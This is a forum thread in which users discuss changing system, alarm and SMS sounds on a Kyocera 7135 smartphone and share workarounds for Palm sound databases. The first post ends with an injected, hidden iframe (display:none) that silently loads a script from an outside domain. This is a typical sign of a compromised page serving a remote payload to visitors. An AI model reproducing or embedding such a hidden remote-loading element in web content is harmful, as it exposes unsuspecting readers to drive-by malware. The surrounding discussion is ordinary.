+ Reply to Thread

Changing system sounds?

How does one go about changing 7135 system sounds? I know how to change the ringer and flip (and yes, I searched the board for system sound) sounds.

Thanks in advance,

Seth<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Which system sounds?

The Alarm sound is changed in the preferences of the datebook application.

The volume of "system sound" (the click you here when you tap buttons), game sound and alarm sound are done in Prefs_PDA on the general tab. (note: don't turn off "system Sound" or your flip sound won't play... grhh.)

The messages application settings can change the sound you hear when receiving an incomong SMS or other alerts. Not a lot of choices for that.

Alan

Alan,

If I'm understanding you correctly, I cannot make the messages sounds any sound I wish! Is that true? I had so many cool ideas for custom sounds for messages.

:anger

Mike

Originally posted by MikeK
    Alan,

If I'm understanding you correctly, I cannot make the messages sounds any sound I wish! Is that true? I had so many cool ideas for custom sounds for messages.

:anger

Mike
    Yeah.. Me too. If enough of us complain to Kyo, maybe they will change it in a download or firmware update.

Alan

Already got a complaint into them on this one. I wanted to be able to use any MP3 instead of the standard beep or vibrate.

"Message for you sir" from Holy Grail was my dream.

System Sound?

I have a question about the system sound, is it possible to either turn down the volume on system sounds and not open flip sounds? Or what about making a blank system sound.

The issue I'm having is when I'm doing things which cause the system sound to play, I usually get the speaker to "pop" as well. Turn off the system sound and I also lose the "popping"

Any ideas? Would the Ringer creator software be used to create a system sound that's blank which could overwrite the current one?

jeh
    If the 7135 is like other Palms the "system sounds" that show up as options for alarms, like "bird', "scifi", etc., are very simple midi sequences, and they are inside a little database - they aren't individual files.

There are some add-on sound databases for Palm available at PalmGear and so on. I don't know if any of them allow you to make your own.

Once I tried one of those databases and I couldn't get datebk4 to see the new sounds, though the standard datebk app could do so. This might have been fixed in recent versions of datebk5, I haven't checked.

I know there are programs for the Treo that allow you to create and add new system sounds. I haven't seen too many ringtone managers for the Kyocera Smartphone. Perhaps this one will work. I won't know 'till I get my 7135.